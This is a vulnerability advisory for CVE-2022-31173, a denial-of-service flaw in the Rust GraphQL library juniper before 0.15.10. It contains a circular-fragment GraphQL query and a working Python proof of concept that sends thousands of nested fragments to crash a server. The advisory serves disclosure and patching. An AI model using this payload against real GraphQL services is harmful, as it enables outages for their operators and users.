CVE-2022-31173 – juniper

Package

Manager: cargo
Name: juniper
Vulnerable Version: >=0 <0.15.10

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N

EPSS: 0.00547 pctl0.66916

Details

Juniper is vulnerable to @DOS GraphQL Nested Fragments overflow ### GraphQL behaviour Nested fragment in GraphQL might be quite hard to handle depending on the implementation language. Some language support natively a max recursion depth. However, on most compiled languages, you should add a threshold of recursion. ```graphql # Infinite loop example query { ...a } fragment a on Query { ...b } fragment b on Query { ...a } ``` ### POC TLDR With max_size being the number of nested fragment generated. At max_size=7500, it should instantly raise: ![](https://i.imgur.com/wXbUx8l.png) However, with a lower size, you will overflow the memory after some iterations. ### Reproduction steps (Juniper) ``` git clone https://github.com/graphql-rust/juniper.git cd juniper ``` Save this POC as poc.py ```python import requests import time import json from itertools import permutations print('=== Fragments POC ===') url = 'http://localhost:8080/graphql' max_size = 7500 perms = [''.join(p) for p in permutations('abcefghijk')] perms = perms[:max_size] fragment_payloads = '' for i, perm in enumerate(perms): next_perm = perms[i+1] if i < max_size-1 else perms[0] fragment_payloads += f'fragment {perm} on Query' + '{' f'...{next_perm}' + '}' payload = {'query':'query{\n ...' + perms[0] + '\n}' + fragment_payloads,'variables':{},'operationName':None} headers = { 'Content-Type': 'application/json', } try: response = requests.request('POST', url, headers=headers, json=payload) print(response.text) except requests.exceptions.ConnectionError: print('Connection closed, POC worked.') ``` ``` cargo run [in separate shell] python3 poc.py ``` ### Credits [@Escape-Technologies](https://escape.tech) @c3b5aw @MdotTIM @karimhreda

Metadata

Created: 2022-07-29T22:29:22Z
Modified: 2022-07-29T22:29:22Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/07/GHSA-4rx6-g5vg-5f3j/GHSA-4rx6-g5vg-5f3j.json
CWE IDs: ["CWE-400", "CWE-674"]
Alternative ID: GHSA-4rx6-g5vg-5f3j
Finding: F067
Auto approve: 1